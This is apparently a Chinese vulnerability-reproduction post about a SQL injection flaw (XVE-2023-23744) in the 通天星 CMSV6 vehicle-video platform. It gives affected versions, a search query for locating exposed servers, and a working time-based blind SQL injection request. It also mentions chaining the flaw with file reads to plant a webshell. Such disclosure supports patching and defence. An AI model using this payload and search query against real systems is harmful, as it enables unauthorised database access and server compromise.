文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!
一:漏洞描述
通天星CMSV6拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机等产品的视频综合平台。
该产品/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入webshell木马。
二:漏洞影响版本
version<7.33.0.2_20240305三:网络空间测绘查询
body="/808gps/"
五:漏洞复现
POC:
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: close
SQL注入是一种常见的网络应用程序漏洞,攻击者通过利用该漏洞可以执行未经授权的数据库操作。SQL注入漏洞的原理是在应用程序中未对用户输入进行充分验证和过滤,导致恶意用户能够将恶意的SQL代码注入到应用程序的数据库查询语句中,从而实现执行额外的SQL语句。延时注入是一种利用SQL注入漏洞的技术手段,它的主要目的是通过构造恶意的SQL语句来引发延时操作。攻击者会利用延时函数或延时语句,使得数据库查询操作在执行过程中出现明显的延迟。
延时注入5秒
六:批量检测
建议更新当前系统或软件至最新版,完成漏洞的修复。原文始发于微信公众号(Adler学安全):漏洞复现-XVE-2023-23744
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论